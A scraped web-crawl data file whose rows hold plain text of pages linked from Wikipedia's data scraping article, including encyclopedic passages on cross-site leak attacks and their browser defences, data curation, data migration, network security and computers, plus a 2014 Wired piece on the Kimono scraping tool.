52 53 Cache-timing attacks rely on the ability to infer hits and misses in shared caches on the web platform. 54 One of the first instances of a cache-timing attack involved the making of a cross-origin request to a page and then probing for the existence of the resources loaded by the request in the shared HTTP and the DNS cache. The paper describing the attack was written by researchers at Purdue University in 2000, and describes the attack's ability to leak a large portion of a user's browsing history by selectively checking if resources that are unique to a web page have been loaded. 55 54 56 This attack has become increasingly sophisticated, allowing the leakage of other types of information. In 2014, Jia et al. showed this attack could geo-locate a person by measuring the time it takes for the localized domain of a group of multinational websites to load. 54 57 58 In 2015, Van Goethem et al. showed using the then-newly introduced application cache, a website could instruct the browser to disregard and override any caching directive the victim website sends. The paper also demonstrated a website could gain information about the size of the cached response by timing the cache access. 59 60 Global limits, which are also known as pool-party attacks, do not directly rely on the state of the victim web app. This cross-site leak was first discovered by Knittel et al. in 2020 and then expanded by Snyder et al. in 2023. 45 The attack to abuses global operating systems or hardware limitations to starve shared resources. 61 Global limits that could be abused include the number of raw socket connections that can be registered and the number of service workers that can be registered. An attacker can infer the state of the victim website by performing an activity that triggers these global limits and comparing any differences in browser behaviour when the same activity is performed without the victim website being loaded. 62 Since these types of attacks typically also require timing side channels, they are also considered timing attacks. 45 In 2019, Gareth Heyes discovered that by setting the URL hash of a website to a specific value and subsequently detecting whether a loss of focus on the current web page occurred, an attacker could determine the presence and position of elements on a victim website. 63 In 2020, Knittel et al. showed an attacker could leak whether or not a Cross-Origin-Opener-Policy header was set by obtaining a reference to the window object of a victim website by framing the website or by creating a popup of the victim website. Using the same technique of obtaining window references, an attacker could also count the number of frames a victim website had through the window.length property. 44 64 While newer techniques continue to be found, older techniques for performing cross-site leaks have become obsolete due to changes in the World Wide Web Consortium (W3C) specifications and updates to browsers. In December 2020, Apple updated its browser Safari's Intelligent Tracking Prevention (ITP) mechanism, rendering a variety of cross-site leak techniques researchers at Google had discovered ineffective. 65 66 67 Similarly, the widespread introduction of cache partitioning in all major browsers in 2020 has reduced the potency of cache-timing attacks. 68 The example of a Python-based web application with a search endpoint interface implemented using the following Jinja template demonstrates a common scenario of how a cross-site leak attack could occur. 36 This code is a template for displaying search results on a webpage. It loops through a collection of results provided by a HTTP server backend and displays each result along with its description inside a structured div element alongside a icon loaded from a different website. The underlying application authenticates the user based on cookies that are attached to the request and performs a textual search of the user's private information using a string provided in a GET parameter. For every result returned, an icon that is loaded from a Content Delivery Network (CDN) is shown alongside the result. 32 69 This simple functionality is vulnerable to a cross-leak attack, as shown by the following JavaScript snippet. 32 This JavaScript snippet, which can be embedded in an attacker-controlled web app, loads the victim web app inside an iframe, waits for the document to load and subsequently requests the icon from the CDN. The attacker can determine whether the icon was cached by timing its return. Because the icon will only be cached if and only if the victim app returns at least one result, the attacker can determine whether the victim app returned any results for the given query. 36 69 26 Before 2017, websites could defend against cross-site leaks by ensuring the same response was returned for all application states, thwarting the attacker's ability to differentiate the requests. This approach was infeasible for any non-trivial website. The second approach was to create session-specific URLs that would not work outside a user's session. This approach limited link sharing, and was impractical. 18 70 Most modern defences are extensions to the HTTP protocol that either prevent state changes, make cross-origin requests stateless, or completely isolate shared resources across multiple origins. 68 One of the earliest methods of performing cross-site leaks was using the HTTP cache, an approach that relied on querying the browser cache for unique resources a victim's website might have loaded. By measuring the time it took for a cross-origin request to resolve an attacking website, one could determine whether the resource was cached and, if so, the state of the victim app. 69 72 As of October 2020 update , most browsers have implemented HTTP cache partitioning, drastically reducing the effectiveness of this approach. 73 HTTP cache partitioning works by multi-keying each cached request depending on which website requested the resource. This means if a website loads and caches a resource, the cached request is linked to a unique key generated from the resource's URL and that of the requesting website. If another website attempts to access the same resource, the request will be treated as a cache miss unless that website has previously cached a identical request. This prevents an attacking website from deducing whether a resource has been cached by a victim website. 74 75 76 Another, more developer-oriented feature that allows the isolation of execution contexts includes the Cross-Origin-Opener-Policy (COOP) header, which was originally added to address Spectre issues in the browser. 77 78 It has proved useful for preventing cross-site leaks because if the header is set with a same-origin directive as part of the response, the browser will disallow cross-origin websites from being able to hold a reference to the defending website when it is opened from a third-party page. 79 80 81 As part of an effort to mitigate cross-site leaks, the developers of all major browsers have implemented storage partitioning, 82 allowing all shared resources used by each website to be multi-keyed, dramatically reducing the number of inclusion techniques that can infer the states of a web app. 83 Cross-site leak attacks depend on the ability of a malicious web page to receive cross-origin responses from the victim application. By preventing the malicious application from being able to receive cross-origin responses, the user is no longer in danger of having state changes leaked. 84 This approach is seen in defences such as the deprecated X-Frame-Options header and the newer frame-ancestors directive in Content-Security Policy headers, which allow the victim application to specify which websites can include it as an embedded frame. 85 If the victim app disallows the embedding of the website in untrusted contexts, the malicious app can no longer observe the response to cross-origin requests made to the victim app using the embedded frame technique. 86 87 A similar approach is taken by the Cross-Origin Resource Blocking (CORB) mechanism and the Cross-Origin-Resource-Policy (CORP) header, which allows a cross-origin request to succeed but blocks the loading of the content in third-party websites if there is a mismatch between the content type that was expected and that which was received. 88 This feature was originally introduced as part of a series of mitigations against the Spectre vulnerability 89 but it has proved useful in preventing cross-origin leaks because it blocks the malicious web page from receiving the response and thus inferring state changes. 86 90 91 One of the most-effective approaches to mitigating cross-site leaks has been the use of the SameSite parameter in cookies. Once set to Lax or Strict, this parameter prevents the browser from sending cookies in most third-party requests, effectively making the request stateless. note 5 91 Adoption of Same-Site cookies, however, has been slow because it requires changes in the way many specialized web servers, such as authentication providers, operate. 93 In 2020, the makers of the Chrome browser announced they would be turning on SameSite Lax as the default state for cookies across all platforms. 94 95 Despite this, there are still cases in which SameSite Lax cookies are not respected, such as Chrome's LAX POST mitigation, which allows a cross-origin site to use a SameSite Lax cookie in a request if and only if the request is sent while navigating the page and it occurs within two minutes of the cookie being set. 92 This has led to bypasses and workarounds against the SameSite Lax limitation that still allow cross-site leaks to occur. 96 97 Fetch metadata headers, which include the Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-User and Sec-Fetch-Dest header, which provide information about the domain that initiated the request, details about the request's initiation, and the destination of the request respectively to the defending web server, have also been used to mitigate cross-site leak attacks. 98 These headers allows the web server to distinguish between legitimate third-party, same-site requests and harmful cross-origin requests. By discriminating between these requests, the server can send a stateless response to malicious third-party requests and a stateful response to routine same-site requests. 99 To prevent the abusive use of these headers, a web app is not allowed to set these headers, which must only be set by the browser. 100 75 |
494 | https://en.wikipedia.org/wiki/Web_scraping | https://developer.wikimedia.org | Find technical documentation, and connect with the developer community behind Wikipedia and other Wikimedia projects. Get started Access articles from Wikipedia, media files, structured data, and more with public APIs and downloads. Tools and bots make it easier to edit and maintain Wikimedia projects. Help build the Wikimedia ecosystem with open source software. Get involved with the Wikimedia technical community, and find opportunities for support and learning. Find resources to help with questions and troubleshooting. |
495 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_curation | Data curation is the organization and integration of data collected from various sources. It involves annotation, publication and presentation of the data so that the value of the data is maintained over time, and the data remains available for reuse and preservation. Data curation includes "all the processes needed for principled and controlled data creation, maintenance, and management, together with the capacity to add value to data". 1 In science, data curation may indicate the process of extraction of important information from scientific texts, such as research articles by experts, to be converted into an electronic format, such as an entry of a biological database. 2 In the modern era of big data, the curation of data has become more prominent, particularly for software processing high volume and complex data systems. 3 The term is also used within the humanities, 4 where increasing cultural and scholarly data from digital humanities projects requires the expertise and analytical practices of data curation. 5 In broad terms, curation means a range of activities and processes done to create, manage, maintain, and validate a component. 6 Specifically, data curation is the attempt to determine what information is worth saving and for how long. 7 The user, rather than the database itself, typically initiates data curation and maintains metadata. 8 According to the University of Illinois' Graduate School of Library and Information Science, "Data curation is the active and on-going management of data through its lifecycle of interest and usefulness to scholarship, science, and education; curation activities enable data discovery and retrieval, maintain quality, add value, and provide for re-use over time. 9 The data curation workflow is distinct from data quality management, data protection, lifecycle management, and data movement. 8 Census data has been available in tabulated punch card form since the early 20th century and has been electronic since the 1960s. 10 The Inter-university Consortium for Political and Social Research (ICPSR) website marks 1962 as the date of their first Survey Data Archive. 11 Deep background on data libraries appeared in a 1982 issue of the Illinois journal, Library Trends. 12 For historical background on the data archive movement, see "Social Scientific Information Needs for Numeric Data: The Evolution of the International Data Archive Infrastructure. 13 The exact curation process undertaken within any organisation depends on the volume of data, how much noise the data contains, and what the expected future use of the data means to its dissemination. 3 The crises in space data led to the 1999 creation of the Open Archival Information System (OAIS) model, 14 stewarded by the Consultative Committee for Space Data Systems (CCSDS), which was formed in 1982. 15 The term data curation is sometimes used in the context of biological databases, where specific biological information is firstly obtained from a range of research articles and then stored within a specific category of database. For instance, information about anti-depressant drugs can be obtained from various sources and, after checking whether they are available as a database or not, they are saved under a drug's database's anti-depressive category. Enterprises are also utilizing data curation within their operational and strategic processes to ensure data quality and accuracy. 16 17 The Dissemination Information Packages (DIPS) for Information Reuse (DIPIR) project is studying research data produced and used by quantitative social scientists, archaeologists, and zoologists. The intended audience is researchers who use secondary data and the digital curators, digital repository managers, data center staff, and others who collect, manage, and store digital information. 18 The Protein Data Bank was established in 1971 at Brookhaven National Laboratory, and has grown into a global project. 19 A database for three-dimensional structural data of proteins and other large biological molecules, the PDB contains over 120,000 structures, all standardized, validated against experimental data, and annotated. FlyBase, the primary repository of genetic and molecular data for the insect family Drosophilidae, dates back to 1992. FlyBase annotates the entire Drosophila melanogaster genome. 20 The Linguistic Data Consortium is a data repository for linguistic data, dating back to 1992. 21 The Sloan Digital Sky Survey began surveying the night sky in 2000. 22 Computer scientist Jim Gray, while working on the data architecture of the SDSS, championed the idea of data curation in the sciences. 23 DataNet was a research program of the U.S. National Science Foundation Office of Cyberinfrastructure, funding data management projects in the sciences. 24 DataONE (Data Observation Network for Earth) is one of the projects funded through DataNet, helping the environmental science community preserve and share data. 25 |
496 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_migration | Data migration is the process of selecting, preparing, extracting, and transforming data and permanently transferring it from one computer storage system to another. Additionally, the validation of migrated data for completeness and the decommissioning of legacy data storage are considered part of the entire data migration process. 1 2 Data migration is a key consideration for any system implementation, upgrade, or consolidation, and it is typically performed in such a way as to be as automated as possible, freeing up human resources from tedious tasks. Data migration occurs for a variety of reasons, including server or storage equipment replacements, maintenance or upgrades, application migration, website consolidation, disaster recovery, and data center relocation. 2 As of 2011 update , "nearly 40 percent of data migration projects were over time, over budget, or failed entirely. 1 3 Thus, proper planning is critical for an effective data migration. While the specifics of a data migration plan may vary—sometimes significantly—from project to project, IBM suggests there are three main phases to most any data migration project: planning, migration, and post-migration. 2 Each of those phases has its own steps. During planning, dependencies and requirements are analyzed, migration scenarios get developed and tested, and a project plan that incorporates the prior information is created. During the migration phase, the plan is enacted, and during post-migration, the completeness and thoroughness of the migration is validated, documented, and closed out, including any necessary decommissioning of legacy systems. 2 For applications of moderate to high complexity, these data migration phases may be repeated several times before the new system is considered to be fully validated and deployed. Planning: The data and applications to be migrated are selected based on business, project, and technical requirements and dependencies. Hardware and bandwidth requirements are analyzed. Feasible migration and back-out scenarios are developed, as well as the associated tests, automation scripts, mappings, and procedures. Data cleansing and transformation requirements are also gauged for data formats to improve data quality and to eliminate redundant or obsolete information. Migration architecture is decided on and developed, any necessary software licenses are obtained, and change management processes are started. 1 2 Migration: Hardware and software requirements are validated, and migration procedures are customized as needed. Some sort of pre-validation testing may also occur to ensure requirements and customized settings function as expected. If all is deemed well, migration begins, including the primary acts of data extraction, where data is read from the old system, and data loading, where data is written to the new system. Additional verification steps ensure the developed migration plan was enacted in full. 1 2 Post-migration: After data migration, results are subjected to data verification to determine whether data was accurately translated, is complete, and supports processes in the new system. During verification, there may be a need for a parallel run of both systems to identify areas of disparity and forestall erroneous data loss. Additional documentation and reporting of the migration project is conducted, and once the migration is validated complete, legacy systems may also be decommissioned. Migration close-out meetings will officially end the migration process. 1 2 There is a difference between data migration and data integration activities. Data migration is a project through which data will be moved or copied from one environment to another, and removed or decommissioned in the source. During the migration (which can take place over months or even years), data can flow in multiple directions, and there may be multiple simultaneous migrations. The ETL (extract, transform, load) actions will be necessary, although the means of achieving these may not be those traditionally associated with the ETL acronym. Data integration, by contrast, is a permanent part of the IT architecture, and is responsible for the way data flows between the various applications and data stores—and is a process rather than a project activity. Standard ETL technologies designed to supply data from operational systems to data warehouses would fit within the latter category. 4 Data is stored on various media in files or databases, and is generated and consumed by software applications, which in turn support business processes. The need to transfer and convert data can be driven by multiple business requirements, and the approach taken to the migration depends on those requirements. Four major migration categories are proposed on this basis. A business may choose to rationalize the physical media to take advantage of more efficient storage technologies. 2 This will result in having to move physical blocks of data from one tape or disk to another, often using virtualization techniques. The data format and content itself will not usually be changed in the process and can normally be achieved with minimal or no impact to the layers above. 5 Similarly, it may be necessary to move from one database vendor to another, or to upgrade the database software being used. The latter case is less likely to require a physical data migration, but this can happen with major upgrades. In these cases a physical transformation process may be required since the underlying data format can change significantly. This may or may not affect behavior in the applications layer, depending largely on whether the data manipulation language or protocol has changed. 6 However, some modern applications are written to be almost entirely agnostic to the database technology, 7 so a change from Sybase, MySQL, IBM Db2 or SQL Server to Oracle should only require a testing cycle to be confident that both functional and non-functional performance has not been adversely affected. Changing application vendor—for instance a new CRM or ERP platform—will inevitably involve substantial transformation as almost every application or suite operates on its own specific data model and also interacts with other applications and systems within the enterprise application integration environment. 8 Furthermore, to allow the application to be sold to the widest possible market, commercial off-the-shelf packages are generally configured for each customer using metadata. Application programming interfaces (APIs) may be supplied by vendors to protect the integrity of the data they must handle. Business processes operate through a combination of human and application systems actions, often orchestrated by business process management tools. When these change they can require the movement of data from one store, database or application to another to reflect the changes to the organization and information about customers, products and operations. Examples of such migration drivers are mergers and acquisitions, business optimization, and reorganization to attack new markets or respond to competitive threat. 9 The first two categories of migration are usually routine operational activities that the IT department takes care of without the involvement of the rest of the business. The last two categories directly affect the operational users of processes and applications, are necessarily complex, and delivering them without significant business downtime can be challenging. A highly adaptive approach, concurrent synchronization, a business-oriented audit capability, and clear visibility of the migration for stakeholders—through a project management office or data governance team—are likely to be key requirements in such migrations. 9 Migration, which focuses on the digital object itself, is the act of transferring, or rewriting data from an out-of-date medium to a current medium and has for many years been considered the only viable approach to long-term preservation of digital objects. 10 Reproducing brittle newspapers onto microfilm is an example of such migration. |
497 | https://en.wikipedia.org/wiki/Data_scraping | https://www.wired.com/2014/03/kimono/ | To revisit this article, visit My Profile, then View saved stories. The number of web pages on the internet is somewhere north of two billion, perhaps as many as double that. It's a huge amount of raw information. By comparison, there are only roughly 10,000 web APIs the virtual pipelines that let developers access, process, and repackage that data. In other words, to do anything new with the vast majority of the stuff on the web, you need to scrape it yourself. Even for the people who know how to do that, it's tedious. Ryan Rowe and Pratap Ranade want to change that. For the last five months, Rowe and Ranade have been building out Kimono, a web app that lets you slurp data from any website and turn it instantly into an API. Using a bookmarklet, you highlight the parts of a site you want to scrape and Kimono does the rest. Those with programming chops can take the code Kimono spits out bake it into their own apps; for the code illiterate, Kimono will automatically rework scraped data into a dynamic chart, list, or a simple web app. In essence, it's a point and click toolkit for taking apart the web, with the aim of letting people build new things with it. Excitement's already bubbling around the potential. Kimono's already raised money from big-name VCs like Ron Conway and its founders have had to turn down at least one offer for an early buy-out. The site's already managing some 15,000 users and it's still in beta. But for Rowe and Ranade, things are just getting started. The idea for Kimono was born out of Rowe's time as a developer at the design consultancy Frog, where he continually ran into the same frustrating problem. A designer would have an idea that revolved around web stuff of one sort or another, but they'd have to find a developer before they could even get a sense of how the idea might actually work. "Getting the data just to prove if these apps would be interesting or not took a huge amount of time, which sucked, Rowe says. "You have these situations where designers and analysts really want to do stuff with data but have no means to get it, adds Ranade, whose most recent gig was at consulting firm McKinsey Company. "We realized that there doesn't need to be that bottleneck. It's about letting artists, historians, sociologists cull and combine content. To laypeople who don't already think of the web in terms of streams, sources, or APIs, it can be hard to grasp Kimono's potential. But early adopters are already using it for a striking variety of projects. When they noticed there was no official API for the recent Sochi Olympics, Rowe and Ranade used Kimono to create one themselves. Devs and designers took it from there, building elegant medal-tracking apps, dynamic maps that visualize when and where Olympians were born, and more. Around the time the Kimono beta went live last month, Golan Levin, a pioneer of computational art and design, was introducing his students at Carnegie Mellon to the unglamorous first steps of any data viz project: acquiring, parsing, and cleaning data. He thought it'd be valuable to acquaint them with the process. While new tools like Temboo are making it easier than ever to work with official APIs for big-name sites, there traditionally haven't been straightforward ways to get structured data off the majority of pages on the web. "Kimono came along and really changed that, Levin says. Levin himself is using Kimono to track real estate purchases in his home town of Pittsburgh. He also cited an upcoming meeting of civic-minded coders called the Pittsburgh Data Brigade, where he expected Kimono to see some use. "Pittsburgh's information systems are so old and creaky that getting data out is really hard, he explains. It's a problem many municipalities face; they're eager to open up their data but lack the means to actually open it up. Kimono could help bridge that gap. These use cases might sound esoteric, and in some senses, they are. But part of the ambition with Kimono is bringing data scraping to a wider audience. It's about letting artists, historians, sociologists and more cull and combine content from various sources and present it in novel ways. As an example, Ranade brings up Malcolm Gladwell's theory about elite hockey players and how their success might be explained by where their birthdays fall in relation to Canada's little league cutoff dates. A successful author like Gladwell can presumably tap a research assistant to trawl Wikipedia and collect the relevant data. A grad student probably cannot. With Kimono, however, she could amass a list of Wikipedia URLs, point Kimono to the "date of birth" and "place of birth" fields, and let it corral the data for her. This sort of birthday little league cutoff connection isn't going to be made by a random developer, Ranade posts, but rather by a person who has "domain knowledge" in that field. "They might not be a programmer, he says. "But if we gave a little bit of programming capability to that person, how could they look at the world in a different way? In the short term, Rowe and Ranade plan to make money by charging users depending on how many APIs they use and how frequently they update (right now the service is in beta, and anyone can make however many APIs they want). They've already heard interest from a number of corporate clients, who see Kimono as a means to free the flow of data between departments and project teams without relying on an internal IT team to act as translator in-between. But the duo is already thinking even bigger picture. To them, Kimono's greatest potential comes out as we move from today's mobile phones and their attendant apps to the next generation of wearable devices and the internet of things. Kimono's greatest potential comes out as we move to the next generation of wearables. "Smartphones are only a transitional point, Rowe says. "From there we go to smartwatches and Google Glass and other ways of interacting with data around you that don't involve a screen. And to get from there to there to there you need to package up web data and make it consumable in all these different contexts. We're trying to position Kimono to be the framework for that conversion. "When the killer apps finally start coming out for things like smartwatches and glasses, they're not going to be made by the companies that have the most interesting data, he continues. "They're going to come from the developers and designers who are thinking about it a little bit differently. If we suspend our doubts for a moment and peer into this crystal ball, Kimono starts to look like something very big indeed. In the scenario Rowe lays out, it takes root as a sort of connective tissue for an entirely new class of interactions and experiences something like a nervous system for the internet of things. You could imagine pointing Kimono at not just websites but other sorts of streams, making objects react to sound, say, or building applications that respond to live video feeds. At that point, you're well beyond the esoteric realm of web scraping. "The ability to turn a website into an API is a very powerful thing, Rowe says. "Being able to turn anything into an API is epically powerful. More From WIRED Reviews and Guides 2024 Cond Nast. All rights reserved. WIRED may earn a portion of sales from products that are purchased through our site as part of our Affiliate Partnerships with retailers. The material on this site may not be reproduced, distributed, transmitted, cached or otherwise used, except with the prior written permission of Cond Nast. Ad Choices |
498 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Network_security | Network security consists of the policies, processes and practices adopted to prevent, detect and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources. 1 Network security involves the authorization of access to data in a network, which is controlled by the network administrator. Users choose or are assigned an ID and password or other authenticating information that allows them access to information and programs within their authority. Network security covers a variety of computer networks, both public and private, that are used in everyday jobs: conducting transactions and communications among businesses, government agencies and individuals. Networks can be private, such as within a company, and others which might be open to public access. Network security is involved in organizations, enterprises, and other types of institutions. It does as its title explains: it secures the network, as well as protecting and overseeing operations being done. The most common and simple way of protecting a network resource is by assigning it a unique name and a corresponding password. Network security starts with authentication, commonly with a username and a password. Since this requires just one detail authenticating the user name—i.e., the password—this is sometimes termed one-factor authentication. With two-factor authentication, something the user 'has' is also used (e.g., a security token or 'dongle', an ATM card, or a mobile phone); and with three-factor authentication, something the user 'is' is also used (e.g., a fingerprint or retinal scan). Once authenticated, a firewall enforces access policies such as what services are allowed to be accessed by the network users. 2 3 Though effective to prevent unauthorized access, this component may fail to check potentially harmful content such as computer worms or Trojans being transmitted over the network. Anti-virus software or an intrusion prevention system (IPS) 4 help detect and inhibit the action of such malware. An anomaly-based intrusion detection system may also monitor the network like wireshark traffic and may be logged for audit purposes and for later high-level analysis. Newer systems combining unsupervised machine learning with full network traffic analysis can detect active network attackers from malicious insiders or targeted external attackers that have compromised a user machine or account. 5 Communication between two hosts using a network may be encrypted to maintain security and privacy. Honeypots, essentially decoy network-accessible resources, may be deployed in a network as surveillance and early-warning tools, as the honeypots are not normally accessed for legitimate purposes. Honeypots are placed at a point in the network where they appear vulnerable and undefended, but they Network security involves the authorization of access to data in a network, which is controlled by the network administrator. Users choose or are assigned an ID ...are actually isolated and monitored. 6 Techniques used by the attackers that attempt to compromise these decoy resources are studied during and after an attack to keep an eye on new exploitation techniques. Such analysis may be used to further tighten security of the actual network being protected by the honeypot. A honeypot can also direct an attacker's attention away from legitimate servers. A honeypot encourages attackers to spend their time and energy on the decoy server while distracting their attention from the data on the real server. Similar to a honeypot, a honeynet is a network set up with intentional vulnerabilities. Its purpose is also to invite attacks so that the attacker's methods can be studied and that information can be used to increase network security. A honeynet typically contains one or more honeypots. 7 Previous research on network security was mostly about using tools to secure transactions and information flow, and how well users knew about and used these tools. However, more recently, the discussion has expanded to consider information security in the broader context of the digital economy and society. This indicates that it's not just about individual users and tools; it's also about the larger culture of information security in our digital world. 8 Security management for networks is different for all kinds of situations. A home or small office may only require basic security while large businesses may require high-maintenance and advanced software and hardware to prevent malicious attacks from hacking and spamming. In order to minimize susceptibility to malicious attacks from external threats to the network, corporations often employ tools which carry out network security verifications . Networks are subject to attacks from malicious sources. Attacks can be from two categories: "Passive" when a network intruder intercepts data traveling through the network, and "Active" in which an intruder initiates commands to disrupt the network's normal operation or to conduct reconnaissance and lateral movements to find and gain access to assets available via the network. 9 Types of attacks include: 10 |
499 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&oldid=1214697307 | This is the current revision of this page, as edited by OAbot (talk contribs) at 16:03, 20 March 2024 (Open access bot: hdl updated in citation with oabot.). The present address (URL) is a permanent link to this version. Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
500 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer | A computer is a machine that can be programmed to automatically carry out sequences of arithmetic or logical operations (computation). Modern digital electronic computers can perform generic sets of operations known as programs. These programs enable computers to perform a wide range of tasks. The term computer system may refer to a nominally complete computer that includes the hardware, operating system, software, and peripheral equipment needed and used for full operation; or to a group of computers that are linked and function together, such as a computer network or computer cluster. A broad range of industrial and consumer products use computers as control systems, including simple special-purpose devices like microwave ovens and remote controls, and factory devices like industrial robots. Computers are at the core of general-purpose devices such as personal computers and mobile devices such as smartphones. Computers power the Internet, which links billions of computers and users. Early computers were meant to be used only for calculations. Simple manual instruments like the abacus have aided people in doing calculations since ancient times. Early in the Industrial Revolution, some mechanical devices were built to automate long, tedious tasks, such as guiding patterns for looms. More sophisticated electrical machines did specialized analog calculations in the early 20th century. The first digital electronic calculating machines were developed during World War II, both electromechanical and using thermionic valves. The first semiconductor transistors in the late 1940s were followed by the silicon-based MOSFET (MOS transistor) and monolithic integrated circuit chip technologies in the late 1950s, leading to the microprocessor and the microcomputer revolution in the 1970s. The speed, power, and versatility of computers have been increasing dramatically ever since then, with transistor counts increasing at a rapid pace (Moore's law noted that counts doubled every two years), leading to the Digital Revolution during the late 20th and early 21st centuries. Conventionally, a modern computer consists of at least one processing element, typically a central processing unit (CPU) in the form of a microprocessor, together with some type of computer memory, typically semiconductor memory chips. The processing element carries out arithmetic and logical operations, and a sequencing and control unit can change the order of operations in response to stored information. Peripheral devices include input devices (keyboards, mice, joystick, etc.), output devices (monitor screens, printers, etc.), and input output devices that perform both functions (e.g., the 2000s-era touchscreen). Peripheral devices allow information to be retrieved from an external source, and they enable the results of operations to be saved and retrieved. It was not until the mid 20th century that the word acquired its modern definition; according to the Oxford English Dictionary, the first known use of the word computer was in a different sense, in a 1613 book called The Yong Mans Gleanings by the English writer Richard Brathwait: "I haue sic read the truest computer of Times, and the best Arithmetician that euer sic breathed, and he reduceth thy dayes into a short number. This usage of the term referred to a human computer, a person who carried out calculations or computations. The word continued to have the same meaning until the middle of the 20th century. During the latter part of this period, women were often hired as computers because they could be paid less than their male counterparts. 1 By 1943, most human computers were women. 2 The Online Etymology Dictionary gives the first attested use of computer in the 1640s, meaning 'one who calculates'; this is an "agent noun from compute (v.) . The Online Etymology Dictionary states that the use of the term to mean 'calculating machine' (of any type) is from 1897. The Online Etymology Dictionary indicates that the "modern use" of the term, to mean 'programmable digital electronic computer' dates from "1945 under this name; in a theoretical sense from 1937, as Turing machine". 3 The name has remained, although modern computers are capable of many higher-level functions. Devices have been used to aid computation for thousands of years, mostly using one-to-one correspondence with fingers. The earliest counting device was most likely a form of tally stick. Later record keeping aids throughout the Fertile Crescent included calculi (clay spheres, cones, etc.) which represented counts of items, likely livestock or grains, sealed in hollow unbaked clay containers. a 4 The use of counting rods is one example. The abacus was initially used for arithmetic tasks. The Roman abacus was developed from devices used in 